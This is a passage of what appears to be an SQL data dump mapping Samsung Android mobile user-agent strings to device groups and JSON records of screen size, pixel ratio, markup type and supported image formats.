AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":385,\"screenHeight\":854,\"pixelRatio\":1.875,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A127M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":385,\"screenHeight\":854,\"pixelRatio\":1.875,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A202F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A205F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A205FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A205G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A205W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A207F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A207M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A217F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A217M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A225F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":385,\"screenHeight\":854,\"pixelRatio\":1.875,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A225M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":385,\"screenHeight\":854,\"pixelRatio\":1.875,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A226B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":857,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A305F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A305FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A305G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A305GT) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A307FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A307G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A307GN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A307GT) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A315F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A315G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A325F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A325M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A326B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":853,\"pixelRatio\":1.875,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A326U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":853,\"pixelRatio\":1.875,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A326W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":385,\"screenHeight\":854,\"pixelRatio\":1.875,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A405FM) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A405FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A415F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A426B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":853,\"pixelRatio\":1.875,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A426U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":385,\"screenHeight\":854,\"pixelRatio\":1.875,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A505F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A505FM) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A505FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A505G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A505GT) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A505U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A505W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A507FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A515F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A515U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A515W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A516B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A516U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A525F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A525M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A526B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A526U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A526W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A528B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":854,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A7050) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A705F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A705FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A705MN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A705W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A715F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A715W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A716U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A716V) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A725F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":853,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A725M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":854,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A805F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-A908B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-F415F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-F700F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":879,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-F707B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":879,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-F711B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":880,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-F916B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":589,\"screenHeight\":736,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-F926B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":872,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-G398FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-G525F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":339,\"screenHeight\":697,\"pixelRatio\":2.125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-G715FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-G770F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-G780F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-G780G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-G781B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-G781U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-G781U1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-G781V) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-G781W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; SM-G970F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 